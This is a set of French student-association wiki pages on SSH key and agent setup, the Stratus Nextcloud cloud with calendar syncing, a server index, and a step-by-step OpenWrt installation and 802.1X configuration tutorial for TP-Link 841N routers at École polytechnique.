Il faut ensuite envoyer le fichier contenant la clé publique (~/.ssh/id_rsa.pub) sur les machines auxquelles on veut se connecter :
==== Avec ssh-copy-id ====
ssh-copy-id login_distant@machine_distante
==== Manuellement ====
Sur les mac, par exemple, ssh-copy-id n'est pas disponible. Il faut donc rajouter manuellement la clé publique à liste des clés autorisées sur la machine distante en copiant le contenu de ~/.ssh/id_rsa.pub (en local) dans .ssh/authorized_keys (sur la machine distante) :
* sur la machine locale :
scp ~/.ssh/id_rsa.pub login_distant@machine_distante:~
* sur la machine distante :
cat ~/id_rsa.pub >> ~/.ssh/authorized_keys

=== ssh-agent ===
Il s'agit d'un programme qui vient faciliter l'utilisation des clés privées : en le lançant au début de ta session graphique, il suffit de taper dans un shell
ssh-add
pour qu'il demande la passphrase de la clé privée, puis la charger en mémoire : plus besoin de taper cette passphrase lors d'un SSH !
Tu peux indiquer par l'option ''-A'' dans ton ssh que tu souhaites ''forwarder'' l'agent : si tu as exporté ta clé publique sur les machines hostA et hostB, alors en faisant
ssh -A hostA
puis, sur hostA
ssh hostB

le second ssh utilisera le ssh-agent qui tourne localement sur ton ordinateur pour récupérer la clé privée et s'authentifier auprès de hostB. Il devient alors intéressant d'utiliser l'option ForwardAgent (cf plus bas) pour pouvoir se balader librement entre les différentes machines.

=== Connection ===
Pour se connecter, on tape
ssh login_distant@machine_distante

Si on a lancé le ssh-agent avant (ssh-add), le client ssh va demander la passphrase de la clé, puis établir la connexion.

=== Fonctionnement===
Lors d'un SSH par clé privée / clé publique
# le serveur ssh va indiquer au client "j'accepte les clés publiques suivantes" en lisant le fichier authorized_keys
# mon client va voir qu'il a la clé privée correspondant
# mon client me demander ma passphrase
# si la passphrase est bonn, mon client va établir le ssh sans me demander mon mot de passe user

== Mémorisation de configuration SSH ==

Il est possible de configurer SSH pour ne pas avoir à préciser le login ou le nom complet de la machine.

Il faut éditer le fichier ''.ssh/config'' :

Host alias
Hostname nom.complet.de.la.machine
User login_distant

=== Proxy ===
On peut également y rajouter les options relatives au Proxy :
ProxyCommand socat - PROXY:kuzh.polytechnique.fr:%h:%p,proxyport=8080
ou
ProxyCommand connect -H kuzh.polytechnique.fr:8080 %h %p
ou celles relatives au transfert d'agent ssh :
ForwardAgent yes

Ainsi,
ssh alias
sera traduit automatiquement en
ssh -A -o ProxyCommand="socat - PROXY:kuzh.polytechnique.fr:%h:%p,proxyport=8080" login_distant@nom.complet.de.la.machine
ou
ssh -A -o ProxyCommand="connect -H kuzh.polytechnique.fr:8080 %h %p" login_distant@nom.complet.de.la.machine

=== Passer par un hôte intermédiaire ===

On a parfois besoin de se logger en SSH de A sur B pour ensuite se logger de B sur C. Pour automatiser ça, il suffit de mettre ces lignes dans {{c|~/.ssh/config}}
Host C
ProxyCommand ssh login@B -W %h:%p

GitLab

2022-08-05T11:52:45Z

Jean-samuel.tettekpoe :

Stratus

2022-08-05T11:43:39Z

Jean-samuel.tettekpoe :

Stratus est le cloud promo. C'est une instance Nextcloud hébergée au BR. Il est accessible aux adresses https://stratus.binets.fr et https://cloud.binets.fr. Tu peux l'utiliser sur ton mobile avec l'application Nextcloud.

Il te permet de partager un dossier avec ton binet (demande au BR pour ça), ou bien avec des utilisateurs ou par lien ; et même de faire des liens de dépôts seulement.

== Centraliser ses calendriers Perso, Sigma et SynapseS grâce à Stratus ==

Stratus, c'est le cloud promo, un endroit où stocker, partager et sauvegarder tous tes fichiers, mais c'est bien plus, c'est aussi un outil pour synchroniser tes contacts et calendriers

== Ajouter des calendriers à l'agenda de Stratus ==

Tu peux aussi ajouter les calendriers Sigma et SynapseS, pour avoir un unique calendrier sur toutes tes machines, qui centralise tes calendriers perso, Sigma et SynapseS, et c'est ce que tu vas apprendre dans ce tutoriel.

== Ajouter le calendrier SynapseS ==

# Ouvre ENEX, rends-toi dans l'onglet "Mes Services", puis coche la case "Créer un lien public pour mon emploi du temps"
# Copie l'adresse qui apparait en dessous dans l'encart bleu
# Ouvre Stratus
# Ouvre l'application Calendar de stratus (Icône de calendrier dans le bandeau bleu en haut)
# Clique sur "New Subscription"
# Colle l'adresse copiée précédemment, puis valide, tes cours devraient apparaître dans le calendrier

== Ajouter le calendrier Sigma ==

# Ouvre Sigma, rends-toi dans l'onglet "Calendrier", puis clique sur le bouton "téléchargement"
# Copie le lien qui correspond au calendrier qui t'intéresse
# Ouvre Stratus
# Ouvre l'application Calendar de stratus (Icône de calendrier dans le bandeau bleu en haut)
# Clique sur "New Subscription"
# Colle l'adresse copiée précédemment, puis valide, les événements Sigma devraient apparaître dans le calendrier

== Synchroniser ce calendrier avec tes appareils ==

Ce guide est là pour t'expliquer comment synchroniser tes contacts et ton calendrier avec Stratus

==== Android ====

# Télécharge l'application "Open Sync"
# Ouvrir l'application et ajouter un nouveau compte (Icône "+" en bas à droite)
# Cocher "Connexion avec une URL et un nom d'utilisateur. L'URL de base est "https://cloud.binets.fr/remote/dav.php". Les identifiants sont les identifiants Sigma.

==== Thunderbird ====
===== Calendrier =====

Suis le guide suivant en remplaçant <code>cloud.nextcloud.com</code> par <code>cloud.binets.fr</code> : https://docs.nextcloud.com/server/13/user_manual/pim/sync_thunderbird.html

===== iOS =====

Suis le guide suivant en remplaçant <code>example.com</code> par <code>cloud.binets.fr</code> : https://docs.nextcloud.com/server/13/user_manual/pim/sync_ios.html

===== Mac OS =====

Suis le guide suivant en remplaçant <code>example.com</code> par <code>cloud.binets.fr</code> : https://docs.nextcloud.com/server/13/user_manual/pim/sync_osx.html

Stratus

2022-08-05T11:40:36Z

Jean-samuel.tettekpoe : Ajout description

Stratus est le cloud promo. C'est une instance Nextcloud hébergée au BR. Il est accessible aux adresses [stratus.binets.fr](https://stratus.binets.fr) et [cloud.binets.fr](https://cloud.binets.fr). Tu peux l'utiliser sur ton mobile avec l'application Nextcloud.

Il te permet de partager un dossier avec ton binet (demande au BR pour ça), ou bien avec des utilisateurs ou par lien ; et même de faire des liens de dépôts seulement.

== Centraliser ses calendriers Perso, Sigma et SynapseS grâce à Stratus ==

Stratus, c'est le cloud promo, un endroit où stocker, partager et sauvegarder tous tes fichiers, mais c'est bien plus, c'est aussi un outil pour synchroniser tes contacts et calendriers

== Ajouter des calendriers à l'agenda de Stratus ==

Tu peux aussi ajouter les calendriers Sigma et SynapseS, pour avoir un unique calendrier sur toutes tes machines, qui centralise tes calendriers perso, Sigma et SynapseS, et c'est ce que tu vas apprendre dans ce tutoriel.

== Ajouter le calendrier SynapseS ==

# Ouvre ENEX, rends-toi dans l'onglet "Mes Services", puis coche la case "Créer un lien public pour mon emploi du temps"
# Copie l'adresse qui apparait en dessous dans l'encart bleu
# Ouvre Stratus
# Ouvre l'application Calendar de stratus (Icône de calendrier dans le bandeau bleu en haut)
# Clique sur "New Subscription"
# Colle l'adresse copiée précédemment, puis valide, tes cours devraient apparaître dans le calendrier

== Ajouter le calendrier Sigma ==

# Ouvre Sigma, rends-toi dans l'onglet "Calendrier", puis clique sur le bouton "téléchargement"
# Copie le lien qui correspond au calendrier qui t'intéresse
# Ouvre Stratus
# Ouvre l'application Calendar de stratus (Icône de calendrier dans le bandeau bleu en haut)
# Clique sur "New Subscription"
# Colle l'adresse copiée précédemment, puis valide, les événements Sigma devraient apparaître dans le calendrier

== Synchroniser ce calendrier avec tes appareils ==

Ce guide est là pour t'expliquer comment synchroniser tes contacts et ton calendrier avec Stratus

==== Android ====

# Télécharge l'application "Open Sync"
# Ouvrir l'application et ajouter un nouveau compte (Icône "+" en bas à droite)
# Cocher "Connexion avec une URL et un nom d'utilisateur. L'URL de base est "https://cloud.binets.fr/remote/dav.php". Les identifiants sont les identifiants Sigma.

==== Thunderbird ====
===== Calendrier =====

Suis le guide suivant en remplaçant <code>cloud.nextcloud.com</code> par <code>cloud.binets.fr</code> : https://docs.nextcloud.com/server/13/user_manual/pim/sync_thunderbird.html

===== iOS =====

Suis le guide suivant en remplaçant <code>example.com</code> par <code>cloud.binets.fr</code> : https://docs.nextcloud.com/server/13/user_manual/pim/sync_ios.html

===== Mac OS =====

Suis le guide suivant en remplaçant <code>example.com</code> par <code>cloud.binets.fr</code> : https://docs.nextcloud.com/server/13/user_manual/pim/sync_osx.html

Modèle:Content serveurs

2022-04-18T10:30:33Z

Jean-samuel.tettekpoe : Ajout serveurs Bachelor

'''Général :'''
* [[Réseau:Attribution des prises local BR|Réseau du local]]
* [[Admin:Configuration des serveurs|Conf des serveurs]]
* [[Admin:Configuration_des_switchs|Conf des switchs cisco]]
* [[Admin:Onduleur|Onduleurs]]

'''Serveurs :'''
{| style="background-color:transparent"
|
* [[Admin:Frankiz|Frankiz]]
* [[Admin:Heol|Heol]]
* [[Admin:Deiz|Deiz]]
* [[Admin:Kevarzh|Kevarzh]]
* [[Admin:Moaz|Moaz]]
* [[Admin:Envorenn|Envorenn]]
* [[Admin:Phoenix|Phoenix]]
|
* [[Admin:Lodan|Lodan]]
* [[Admin:Lodan2|Lodan2]]
* [[Admin:Lunedenn|Lunedenn]]
* [[Admin:Galloudel|Galloudel]]
* [[Admin:Garvleiz|Garvleiz]]
* [[Admin:Diavaez|Diavaez]]
* [[Admin:Bachelor|Bachelor]]
|}

'''VMs :'''
{| style="background-color:transparent"
|
* {{a|Gitlab}}
* {{a|Quassel}}
|
* {{a|Matrix}}
* {{a|Taolenn}}
|}
'''Anciens serveurs'''
{| style="background-color:transparent"
|
* [[Admin:Gwennoz|Gwennoz]]
* [[Admin:Pellwel|Pellwel]]
* [[Admin:Koun|Koun]]
|
* [[Admin:Skinwel|Skinwel]]
* [[Admin:Enez|Enez]]
* [[Admin:Skignerezh|Skignerezh]]
|}

Routeurs Wi-Fi/Tutoriel

2022-04-02T17:24:57Z

Jean-samuel.tettekpoe : Actualiser les ip des dns

{{Travaux|Pour toute remarque ou demande, ouvrir une tâche Panix}}

== Avertissements ==

{{Attention|Pour commencer, il est recommandé de lire toutes les parties qui vous intéressent ''avant'' de faire quoi que ce soit. Cela vous évitera des erreurs stupides qui vous feront perdre du temps. Si vous souhaitez acheter un routeur, tournez vous faire des modèles avec plus de RAM que celui-ci (contacter le BR direcetement pour plus d'infos) !}}

=== Avertissement technique ===

'''Modèle de routeur.''' Le système que vous vous apprêtez à installer n'est pas compatible avec tous les routeurs, loin de là ! Le fichier fourni par ce tutoriel est uniquement compatible avec le routeur '''TP-Link 841N''' ou '''TP-Link 841ND''', versions 11 (La version est écrite sur une étiquette du routeur et sur la boîte près du code barre.) . ''D'autres versions peuvent être compatibles mais n'ont pas été testé.''

Si vous souhaitez tout de même utiliser un autre modèle, il faudra vous référer au site web d'openwrt {{c|http://openwrt.org/}} qui contient entre autres la liste des modèles compatibles. IL faut prendre des modèles avec suffisament de RAM pour que cela fonctionne et compatible avec des versions récentes d'openwrt (le plus récent le mieux pour des questions de sécurité, mais au minimum openwrt 20.0). Cependant ce guide sera très spécifique pour le TP-link 841N et Tp-link 841ND.

'''Méthode de connexion.''' Pour configurer le routeur vous allez devoir vous y connecter. Pour cela brancher un câble ethernet à votre PC et sur un port orange du routeur (pensez aussi à brancher préalablement le routeur).

=== Avertissement juridique ===

Si vous configurez ce routeur pour fonctionner avec 802.1X (dans les caserts de l'École polytechnique en général), cela signifie que votre routeur sera connecté au réseau avec ''vos identifiants''.

En particulier, puisque vous avez parfaitement le droit de partager votre connexion Wi-Fi avec qui bon vous semble, souvenez-vous que toute personne connectée à votre Wi-Fi est sous votre responsabilité.

== Principe ==

Les routeurs du commerce ne gèrent pas les systèmes de sécurité utilisés à l'École polytechnique pour votre connexion internet. Pour compenser ce problème, une solution est d'installer un système auxiliaire (OpenWRT) sur les routeurs, remplaçant le système d'origine. Grâce à ceci on peut obtenir un routeur qui s'authentifie lui-même sur le réseau de l'École, et fournit un réseau wifi sur lequel les réseaux interne et externe sont accessibles sans problèmes de réglages de vos téléphones et ordinateurs.

== Préparation ==

=== Linux ===

Dans le cas des systèmes UNIX, la préparation est assez rapide car les outils sont déjà installés.

==== Terminal ====

Pour faire la configuration il vous faudra être capable d'accéder à votre terminal. Pour la plupart des systèmes on peut le lancer avec {{c|ctrl+alt+T}} ou en cherchant « terminal » dans le menu principal.

==== SSH et SCP ====

Vous aurez besoin d'un client {{c|ssh}} (par défaut installé sous linux) :

$ sudo apt-get install openssh-client

La commande {{c|ssh}} permet ensuite de se connecter à distance et de façon sécurisée à un terminal.

La commande {{c|scp}}, fournie par le même paquet, permet de transférer des fichiers avec le même protocole.

==== Configuration réseau ====

Pour vous connecter au routeur il vous faudra créer un nouveau profil de configuration ethernet selon les paramètres suivants :

[[Image:routeurs-settings-eth-linux.jpg|500px]]

==== Récupération ====

Pour pouvoir récupérer une erreur commise avec votre routeur, il faut tout d'abord installer un serveur ssh :

$ sudo apt-get install openssh-server
$ sudo service ssh start

Vous aurez ensuite besoin d'un nouveau profil de connexion réseau qui vous permettra de réaliser la remise à zéro du routeur :

[[Image:routeurs-settings-eth0-linux.jpg|500px]]

=== MacOS ===

==== Terminal ====

La console de MacOS est accessible via une application appelée '''Terminal'''. Vous la trouverez dans le dossier « Utilitaires » du dossier « Applications ». Elle vous permettra de taper les commandes nécessaires.

==== SSH et SCP ====

Le programme {{c|ssh}} est en général installé sur MacOS X, et permet de se connecter à distance à d'autres ordinateurs (en l'occurrence au routeur).

Il en est de même pour {{c|scp}} qui est destiné au transfert de fichiers.

==== Configuration réseau ====

Pour pouvoir se connecter facilement au routeur le plus simple est de créer un nouveau profil de configuration :

[[Image:routeurs-settings-eth-1-mac.jpg|500px]]

[[Image:routeurs-settings-eth-2-mac.jpg|500px]]

=== Windows ===

==== Terminal ====

Sous Windows il existe plusieurs options.

Soit vous utilisez le powershell (windows terminal sous windows 11), soit vous utilisez Ubuntu via WSL. Si vous utilisez WSL veuillez vous référer à la partie Linux précédente pour installer les paquets nécessaires à la réalisation du tutoriel.

==== Configuration réseau ====

Il vous faudra aussi configurer votre connexion réseau en '''DHCP''', sans la sécurité '''802.1X''', et de préférence avec les bons serveurs '''DNS'''. Si vous ne l'avez jamais fait, renseignez-vous sur le wikibr ou tout autre site décrivant la configuration réseau sous Windows.

=== Terminal ===

Dans le terminal de votre ordinateur nous n'utiliserons que '''ssh''' et '''scp''' . En revanche nous utiliserons beaucoup le terminal du routeur, qui ressemblera à ceci :

neze@neze ~$ ssh root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is **:**:**:**:**:**:**:**:**:**:**:**:**:**:**:**.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
root@192.168.1.1's password: # ici le password n'apparaîtra pas

BusyBox v1.23.2 (2015-11-17 16:24:55 CET) built-in shell (ash)

_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
CHAOS CALMER (Chaos Calmer, r47466)
-----------------------------------------------------
* 1 1/2 oz Gin Shake with a glassful
* 1/4 oz Triple Sec of broken ice and pour
* 3/4 oz Lime Juice unstrained into a goblet.
* 1 1/2 oz Orange Juice
* 1 tsp. Grenadine Syrup
-----------------------------------------------------
root@OpenWrt:~#

== Installation ==

Cette section est destinée à décrire l'installation du système '''OpenWRT''' sur un des deux routeurs traités. Plusieurs fichiers vous sont proposés. En général avant de l'installer il faut renommer un fichier.

=== Installer OpenWRT sur le routeur ===

Pour installer '''OpenWRT''' il faut d'abord préparer le fichier que vous allez mettre dans le routeur, qui est une version d'OpenWRT prévue pour le v10 et v11 et modifiée pour l'École polytechnique. Les informations sur ce fichier incluent aussi des sommes de contrôle si vous voulez vérifier que le fichier est le bon. Pensez à le décompresser avant toute chose.

'''Nom:''' openwrt-19.07.2-ath79-tiny-tplink_tl-wr841-v11-squashfs-factory.bin
(md5) c7ac93636caf4935665c54fa09ba1421
(sha1) 83a9763418ce2bda4e29f0ae46d827e3ef506e48
(sha256) 9099e9054b370676b6467b6fb29c8f5a248839d2e3960686d0b6297c5c42763a

[[Fichier:routeurv11openwrt.zip]]

Il faut commencer par renommer votre fichier pour qu'il corresponde à votre routeur, suivant le schéma suivant :

wr841nv11_wr841ndv11_en_3_16_9_up(150616).bin # tl841n v11

Ouvrez ensuite, avec votre navigateur web, la page de configuration du routeur. Son adresse est
<tt>http://192.168.1.1/</tt> ou <tt>http://192.168.0.1/</tt>
et il vous faut parfois désactiver le proxy pour y accéder.

[[Image:routeurs-tp-link-page.jpg|500px]]

Il faut ensuite se connecter à l'interface (nom d'utilisateur {{c|admin}}, même mot de passe), puis accéder à l'onglet '''System > Firmware Upgrade'''. Dans cette fenêtre vous pouvez sélectionner votre fichier ''bien renommé'', puis cliquer sur Upgrade et confirmer.

OpenWRT va être installé sur le routeur qui va ensuite redémarrer.

== Configuration ==

=== Accès SSH ===

Actuellement le routeur n'a pas de mot de passe administrateur, ce qui empêche d'utiliser {{c|ssh}} pour s'y connecter.

Pour des raisons techniques, le routeur n'a pas d'interface web. On peut dans ce cas utiliser {{c|telnet}} et la commande {{c|passwd}} lorsque l'on dispose d'un terminal. L'on peut si on le souhaite mettre un mot de passe (très fortement conseillé) :

neze@neze ~ $ ssh root@192.168.1.1

BusyBox v1.23.2 (2016-01-02 18:01:44 CET) built-in shell (ash)
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
CHAOS CALMER (15.05.1, r48532)
-----------------------------------------------------
* 1 1/2 oz Gin Shake with a glassful
* 1/4 oz Triple Sec of broken ice and pour
* 3/4 oz Lime Juice unstrained into a goblet.
* 1 1/2 oz Orange Juice
* 1 tsp. Grenadine Syrup
-----------------------------------------------------
root@OpenWrt:/# passwd
Changing password for root
New password:
Retype password:
Password for root changed by root
root@OpenWrt:/#

=== Donner l'accès internet au routeur ===

Pour que le routeur fonctionne à l'École, il faut qu'il soit branché à la prise de votre casert via la prise bleue du routeur. Il faut ensuite le configurer pour qu'il ait accès à internet.

==== 802.1X ====

Dans la plupart des caserts de l'X, la sécurité est 802.1X (celle qui demande une authentification). Pour la configurer il faut mettre vos identifiants enex dans le routeur.

* Connectez-vous au routeur via ssh.

ssh root@192.168.1.1

* Éditez le fichier de configuration de '''wpa''' en complétant les champs identity et password puis en copiant collant dans le terminal (faire CTRL+C et CTRL+V).

nano /etc/config/wpa.conf

''Une fois l'édition terminée, faire CTRL+X puis y pour valider''

*Fichier wpa.conf :

ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=root
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=TTLS
identity="prénom.nom@polytechnique.fr"

anonymous_identity="anonymous@polytechnique.fr"
password="xxxxx"
phase1="auth=TTLS"
phase2="auth=PAP"
}

* Rendez le fichier éxécutable :

chmod +x /etc/config/wpa.conf

* Testez la configuration. Votre routeur doit être branché à internet.

wpa_supplicant -D wired -i eth1
-c /etc/wpa_supplicant/polytechnique.conf

''Si vous voyez le texte '''CTRL-EVENT-CONNECTED''' c'est bon, vous pouvez interrompre avec '''Ctrl+C''' et continuer la configuration.''
''Si vous obtenez un message d'erreur à propos du certificat (comme par exemple ci-dessous), essayez de mettre votre routeur à l'heure puis reprenez cette étape.''

X509: Certificate not valid (now=XXXXXX not_before=XXXXXX not_after=XXXXXX)

* Configurer le démarage automatique en copiant collant le fichier si dessous:

nano /etc/init.d/wpa

''Une fois l'édition terminée, faire CTRL+X puis y pour valider''

* Fichier wpa :

#!/bin/sh /etc/rc.common
# Copyright (C) 2007 OpenWrt.org
START=99

start() {
echo start
wpa_supplicant -D wired -i eth1 -c /etc/config/wpa.conf &
}

* Activez le démarrage automatique.

/etc/init.d/wpa start
/etc/init.d/wpa enable

''Si vous obtenez un message d'erreur du type '''Permission denied''', tentez d'abord de rendre le fichier exécutable avec {{c|chmod +x /etc/init.d/wpa}}.''

Configuration de {{c|wpa-supplicant}} :

neze@neze ~ $ ssh root@192.168.1.1
root@192.168.1.1's password:
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
root@OpenWrt:~# vim /etc/wpa_supplicant/polytechnique.conf
root@OpenWrt:~# wpa_supplicant
-c /etc/wpa_supplicant/polytechnique.conf
-D wired -i eth1
Successfully initialized wpa_supplicant
eth1: Associated with 01:80:c2:00:00:03
WMM AC: Missing IEs
eth1: CTRL-EVENT-EAP-STARTED EAP authentication started
eth1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
eth1: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
TLSv1: you should reject under 768-bit DH prime (insecure; only 512 bits)
eth1: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully
eth1: CTRL-EVENT-CONNECTED - Connection to **:**:**:**:**:** completed [id=0 id_str=]
^Ceth1: CTRL-EVENT-DISCONNECTED bssid=**:**:**:**:**:** reason=3 locally_generated=1
eth1: CTRL-EVENT-TERMINATING
root@OpenWrt:~# vim /etc/init.d/wpa
root@OpenWrt:~# /etc/init.d/wpa enable
root@OpenWrt:~#

==== IP fixe ====

Si votre configuration est en IP fixe, ouvrez l'interface web d'OpenWRT. Dans l'onglet '''Network > Interfaces''', cliquez sur le bouton '''Edit''' de l'interface '''WAN''', changez le protocole en « statique », confirmez en cliquant sur '''Switch protocol''' puis remplissez les trois champs « IPv4 address, IPv4 netmask, IPv4 gateway ». Enfin, rajoutez les serveurs dns {{c|129.104.201.53}} et {{c|129.104.201.51}}.

[[Image:routeurs-openwrt-ipf-gui.jpg|500px]]

Si vous n'avez pas accès à l'interface web, connectez vous en ssh au routeur puis tapez les commandes suivantes, en adaptant évidemment les valeurs de l'adresse IP, du masque de sous-réseau et de la passerelle par défaut.

root@OpenWrt:~# uci set network.wan.proto='static'
root@OpenWrt:~# uci set network.wan.ipaddr='129.104.222.109'
root@OpenWrt:~# uci set network.wan.netmask='255.255.255.0'
root@OpenWrt:~# uci set network.wan.gateway='129.104.222.254'
root@OpenWrt:~# uci set network.wan.dns='129.104.201.59 129.104.201.51'
root@OpenWrt:~# uci commit network
root@OpenWrt:~#

=== Réglages Wi-Fi ===

Cette section vous permettra de mettre en place un réseau wifi avec une sécurité correcte et aux normes françaises.

Connectez-vous au routeur en '''SSH''' et suivez la procédure ci-dessous en adaptant à votre choix de nom de réseau et mot de passe wifi.

'''Attention :''' votre mot de passe doit faire plus de 8 caractères, sans quoi le réseau wifi ne démarrera jamais.

root@OpenWrt:~# uci set wireless.@wifi-device[0].disabled=0
root@OpenWrt:~# uci set wireless.@wifi-iface[0].ssid='MON-RESEAU-WIFI'
root@OpenWrt:~# uci set wireless.@wifi-iface[0].encryption='psk2'
root@OpenWrt:~# uci set wireless.@wifi-iface[0].key='MOT-DE-PASSE'
root@OpenWrt:~# uci set wireless.@wifi-device[0].country='FR'
root@OpenWrt:~# uci commit wireless; wifi
root@OpenWrt:~#

== Fonctionnalités supplémentaires ==

=== Changer l'heure du routeur ===

L'heure du routeur est assez simple à changer. ''Normalement, elle se met à l'heure automatiquement, mais vous pouvez avoir besoin de la changer '''avant''' d'avoir accès à Internet.''

C'est assez simple à faire en ligne de commande :

root@OpenWrt:~# date --set '2016-07-24 09:58'
Sun Jul 24 09:58:00 CEST 2016

Vous pouvez aussi passer, si vous le souhaitez, par l'interface graphique :

[[Image:routeurs-openwrt-date-gui.jpg|500px]]

== Récupération, problèmes ==

=== Routeur briqué ===

Il se peut, après certaines mauvaises manipulations, que le routeur ne soit plus accessible, que l'interface web disparaisse, que vous ayez des messages d'erreurs intempestifs vous empêchant de le configurer, etc.

root@OpenWrt:~# touch test
touch: test: Read-only file system
root@OpenWrt:~#

Il faut dans ce cas effectuer une opération de récupération du routeur, dont la description est faite avec Linux dans ce document (Il est assez simple de l'adapter pour un Mac, beaucoup plus compliqué pour Windows.) . Vous aurez besoin d'un profil de configuration réseau « IP fixe », décrit en début de tutoriel.

* Récupérez le fichier d'openwrt correspondant à votre routeur, et copiez-le dans le répertoire de votre choix (dans notre cas il sera dans {{c|~/firmware.bin}}).
* Redémarrez votre routeur.

Au moment où le voyant « cadenas » commence à clignoter, enfoncez le bouton '''reset''' (derrière le routeur) jusqu'à ce que le voyant clignote beaucoup plus rapidement.
* Branchez votre routeur à l'ordinateur et passez dans le profil de configuration IP fixe, puis ouvrez un terminal et exécutez la procédure ci-dessous.

neze@neze ~ $ md5sum firmware.bin
06179235c8986228ea0c545d6d69df8b firmware.bin
neze@neze ~ $ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
...
================= FAILSAFE MODE active ================
...
=======================================================

root@(none):/# mount_root
root@(none):/# cd /tmp
root@(none):/tmp# scp neze@192.168.1.22:firmware.bin ./
Do you want to continue connecting? (y/n) y
neze@192.168.1.22's password:
firmware.bin 100
root@(none):/tmp# mtd -r write firmware.bin firmware
Unlocking firmware ...

Writing from firmware.bin to firmware ... [w]
Rebooting ...

=== Routeur sans OS ===

Si vous avez installé un OpenWRT corrompu ou tenté de réinstaller le système d'origine sans réfléchir, vous avez peut-être un routeur qui ne démarre pas jusqu'au bout.

Cette section est valable si le {{c|bootloader}} est présent. Un bon moyen de le savoir est d'enfoncer le bouton reset (routeur éteint) puis d'allumer le routeur (reset enfoncé). Si au bout d'un certain temps le voyant du cadenas reste allumé, c'est probablement le cas. Éteignez alors le routeur.

''Procédure testée sur un routeur TP-Link 841N v10.''

'''Préparez votre ordinateur.''' Installez sur un ordinateur '''Linux''' (Ces remarques s'appliquent à Debian et doivent être adaptées.) un serveur {{c|tftp}} :

sudo apt-get install tftp xinetd tftpd

Normalement, {{c|xinetd}} sera alors le process chargé de gérer les serveurs. Vous pouvez vérifier que c'est lui qui tourne avec la commande {{c|ps -alxww | grep inet}}.

Vérifiez ensuite (dans {{c|/etc/services}}) que la ligne concernant {{c|tftp}} n'est pas commentée :

tftp 69/udp

Faites les réglages d'un serveur {{c|tftp}} en créant/éditant le fichier {{c|/etc/xinetd.d/tftp}} :

service tftp
{
socket_type = dgram
protocol = udp
wait = yes
user = root
server = /usr/sbin/in.tftpd
server_args = -s /tftpboot
disable = no
}

Redémarrez le service avec la commande {{c|service xinetd restart}}. Désormais tous les fichiers présents dans {{c|/tftpboot}} seront accessibles dans votre serveur tftp.

Vous pouvez par exemple tester votre serveur tftp de la sorte :

neze tmp.9B8qi7nCqn # echo "Hello World" > /tftpboot/hello.txt
neze tmp.9B8qi7nCqn # tftp localhost
tftp> get hello.txt
Received 13 bytes in 0.0 seconds
tftp> quit
neze tmp.9B8qi7nCqn # cat hello.txt
Hello World
neze tmp.9B8qi7nCqn #

Prenez une image valable d'OpenWRT, déposez-la dans {{c|/tftpboot}} renommée suivant le schéma suivant :

wr841nv10_tp_recovery.bin # tl841n v10
wr841nv11_tp_recovery.bin # tl841n v11

Configurez votre connexion ethernet en '''IP fixe''' {{c|192.168.0.66}}.

Branchez le routeur à votre ordinateur, enfoncez le bouton reset, démarrez le routeur et attendez que le routeur redémarre après réinstallation du firmware.

=== Routeur n'accepte plus le certificat ===
Une des causes possibles est que la date de votre routeur est incorrecte.
Voir la section [[#Problème_de_date|sur ce sujet-là]].

=== Problème de date ===
Pour connaître la date enregistrée par votre routeur :
:<code>date</code>

Si la date est incorrecte, vous pouvez la changer avec la commande suivante (à adapter avec la date actuelle) :
:<code>date --set '2016-07-31 19:20:00'</code>

Si le problème persiste, vous pouvez procéder ajouter les étapes suivantes :
# <code>date --set '2016-07-31 19:20:00'</code>
# <code>echo "timesave" > /etc/timesave</code> (1er fix)
# Modifier le fichier /etc/init.d/sysfixtime, en remplaçant
#:<code>[ $curtime -lt $maxtime ] && date -s @$maxtime</code>
#:par
#:<code>if [ $curtime -lt $maxtime ]; then</code>
#:<code>date -s @$maxtime</code>
#:<code>/etc/init.d/sysntpd restart</code>
#:<code>fi</code>

=== Je dois souvent redémarrer mon routeur ===
Un problème connu implique redsocks. Un workaround consiste à activer cron et à vérifier régulièrement que le service est lancé. On peut par exemple procéder ainsi :
<pre>/etc/init.d/redsocks enable

crontab -e

0 */1 * * * /etc/init.d/redsocks stop && /etc/init.d/redsocks start
*/3 * * * * /etc/init.d/redsocks start

/etc/init.d/cron enable
</pre>

Astuces ssh

2022-03-20T23:11:17Z

Jean-samuel.tettekpoe : /* Créer un couple de clefs : */

Voir aussi [[SSH]].

==Créer un couple de clefs :==
$ ssh-keygen -t rsa
Utiliser un password pour crypter la clef est important...

==Mettre la clef sur le serveur cible :==
$ ssh-copy-id -i ./ssh/id_dsa.pub serveur
ou bien ( en moins bien ) :
$ ssh serveur "cat >> .ssh/authorized_keys" < ./ssh/id_dsa.pub

==Pour ne pas avoir à décrypter la clef à chaque utilisation, mais tout en la gardant en sécurité :==
Démarrer ssh-agent:
$ eval $(ssh-agent)

Ajouter une clef :
$ ssh-add
Forwarder l'agent (ie ne pas avoir à mettre de clef sur B pour faire ssh B puis ssh C depuis B ) :
ForwardAgent yes
Dans les .ssh/config de tous les hosts qui servent de relai, à défaut, utiliser -A dans la ligne de commande de ssh.

Utiliser keychain pour partager ses clefs sur plusieurs sessions, ajouter par exemple :
keychain ~/.ssh/id_rsa ~/.ssh/id_dsa
source ~/.keychain/*-sh

à votre .bash_profile.

==Utiliser des pseudo alias :==

Dans un fichier texte ssh-aliases
#!/bin/bash
ssh $(basename $0) "$@"

puis le rendre utilisable :

chown root:root ssh-aliases &&
chmod 755 ssh-aliases &&
